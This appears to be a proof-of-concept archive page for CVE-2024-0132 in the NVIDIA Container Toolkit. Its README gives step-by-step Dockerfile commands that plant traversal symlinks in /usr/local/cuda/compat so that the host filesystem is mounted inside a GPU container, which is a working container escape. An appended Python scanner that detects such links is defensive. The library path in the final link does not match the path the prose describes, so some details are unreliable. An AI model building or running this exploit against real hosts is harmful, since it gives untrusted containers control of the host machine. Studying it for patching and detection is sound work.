POC details: 7f8776a0f776130eb9d893634d0983a386b00e70

Source
Related vulnerability
Title: NVIDIA Container Toolkit security vulnerability (CVE-2024-0132)
Description: NVIDIA Container Toolkit is a container toolkit from NVIDIA (USA) that lets users build and run GPU-accelerated containers. NVIDIA Container Toolkit 1.16.1 and earlier contain a security vulnerability: when used in the default configuration, a time-of-check time-of-use (TOCTOU) flaw exists, and successful exploitation may lead to code execution, denial of service, privilege escalation, information disclosure and data tampering.
Description
CVE-2024-0132 – Fully Weaponized NVIDIA Container Toolkit Exploit
Introduction
# CVE-2024-0132
CVE-2024-0132 PoC

Let's start by deciding on a base image. The arrangement of libraries in the system depends on what it will be. For example, for `alpine` it will be `/usr/lib64/`, for `ubuntu` it will be `/usr/lib/x86_64-linux-gnu`. We will use `ubuntu` as a base image.

```dockerfile
FROM ubuntu
```

The NVIDIA Container Toolkit checks the libraries in `/usr/local/cuda/compat/` inside the container and then mounts them into the main library directory; for this image (`ubuntu`) that is `/usr/lib/x86_64-linux-gnu`.

Symlinks are mounted too, so any file or directory from the image can be mounted into `/usr/lib/x86_64-linux-gnu`. The toolkit checks that a link resolves inside the container, so a link cannot use a run of `../` for path traversal. However, this check can be circumvented by going through the in-container mount via `/usr/local/cuda/compat/` twice, hence the TOCTOU.

Read more about the mechanism for mounting from `/usr/local/cuda/compat/`:

- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_container.c#L61
- https://github.com/NVIDIA/libnvidia-container/blob/4c2494f16573b585788a42e9c7bee76ecd48c73d/src/nvc_mount.c#L768

```dockerfile
RUN mkdir -p /usr/local/cuda/compat/
```

Create two directories:
1. The original directory will contain a regular file with the contents of `test`

```dockerfile
RUN mkdir -p /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/
RUN echo test > /usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

2. The second directory with the same name will contain a link with path traversal instead of a file.

```dockerfile
RUN mkdir -p /pwn/libdxcore.so.1337/
RUN ln -s ../../../../../../../../../ /pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs
```

The name `libdxcore.so` is chosen to satisfy filters. The major version (1337) must be different from the real driver version.

Create two links in `/usr/local/cuda/compat/`:
1. The first link will substitute the contents of the original directory `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/` for `/pwn/libdxcore.so.1337/`

```dockerfile
RUN ln -s /pwn/libdxcore.so.1337 /usr/local/cuda/compat/libxxx.so.1
```

2. The second link mounts `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs` to `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs`. At check time it is a regular file, but at mount time it is the link that was in `/pwn/libdxcore.so.1337/libdxcore.so.1337.hostfs`, so the host filesystem ends up mounted at `/usr/lib/x86_64-linux-gnu/libdxcore.so.1337.hostfs/`.

```dockerfile
RUN ln -s /usr/lib64/libdxcore.so.1337/libdxcore.so.1337.hostfs /usr/local/cuda/compat/libxxx.so.2
```
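As an added defensive example (not part of this PoC or of NVIDIA's code): a Python scan that walks an unpacked container image root and flags `/usr/local/cuda/compat` symlinks with the two properties the walkthrough above relies on, a link that leaves the compat directory and a reachable link whose `../` run climbs above the image root. The sample image tree, the `libcuda.so.1.2.3` name and the mkdtemp prefix are constructed here; the layout mirrors the Dockerfile steps described above.

```python
import os
import tempfile
from pathlib import Path

COMPAT = Path("usr/local/cuda/compat")  # relative to the unpacked image root

def _escapes_root(rootfs: Path, link: Path) -> bool:
    # More '..' components than the link's depth means the target climbs above the root.
    ups = sum(p == ".." for p in Path(os.readlink(link)).parts)
    return ups > len(link.parent.relative_to(rootfs).parts)

def scan_compat_dir(rootfs: str) -> list[str]:
    """Return findings for symlinks under /usr/local/cuda/compat of an unpacked image."""
    root, findings = Path(rootfs), []
    compat = root / COMPAT
    if not compat.is_dir():
        return findings
    for entry in sorted(compat.iterdir()):
        if not entry.is_symlink():
            continue  # regular compat libraries are expected here
        raw, rel = os.readlink(entry), entry.relative_to(root)
        if os.path.isabs(raw) or ".." in Path(raw).parts:
            findings.append(f"{rel} -> {raw}: link leaves the compat directory")
        # Map the target onto the image: absolute off the root, relative off the link's directory.
        target = Path(raw)
        dest = root / target.relative_to("/") if target.is_absolute() else entry.parent / target
        if ".." in dest.parts:
            continue  # never follow a traversal target out of the image tree
        # A link to a directory lets the mount source be swapped after the check: inspect
        # what is inside it (or the target itself) for a link that climbs above the root.
        for cand in (list(dest.iterdir()) if dest.is_dir() else [dest]):
            if cand.is_symlink() and _escapes_root(root, cand):
                findings.append(f"{rel}: reaches {cand.relative_to(root)}, which escapes the image root")
    return findings

def build_sample_rootfs() -> str:
    """Constructed image root mirroring the README's layout (not a real image)."""
    root = Path(tempfile.mkdtemp(prefix="cve-2024-0132-scan-"))
    libdir, pwn = root / "usr/lib/x86_64-linux-gnu/libdxcore.so.1337", root / "pwn/libdxcore.so.1337"
    for d in (libdir, pwn, root / COMPAT):
        d.mkdir(parents=True)
    (libdir / "libdxcore.so.1337.hostfs").write_text("test\n")
    (pwn / "libdxcore.so.1337.hostfs").symlink_to("../../../../../../../../../")
    compat = root / COMPAT
    (compat / "libcuda.so.1.2.3").write_bytes(b"\x7fELF")  # benign regular file (constructed name)
    (compat / "libcuda.so.1").symlink_to("libcuda.so.1.2.3")  # benign in-directory link
    (compat / "libxxx.so.1").symlink_to("/pwn/libdxcore.so.1337")
    (compat / "libxxx.so.2").symlink_to("/usr/lib/x86_64-linux-gnu/libdxcore.so.1337/libdxcore.so.1337.hostfs")
    return str(root)
```

Run `scan_compat_dir` against an image exported with `docker save` and unpacked, or against a build context; the benign `libcuda.so.1` link produces no finding, while both `libxxx` links do.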
File snapshot

```text
[4.0K] /data/pocs/7f8776a0f776130eb9d893634d0983a386b00e70
├── [ 502] Dockerfile
└── [2.6K] README.md

0 directories, 2 files
```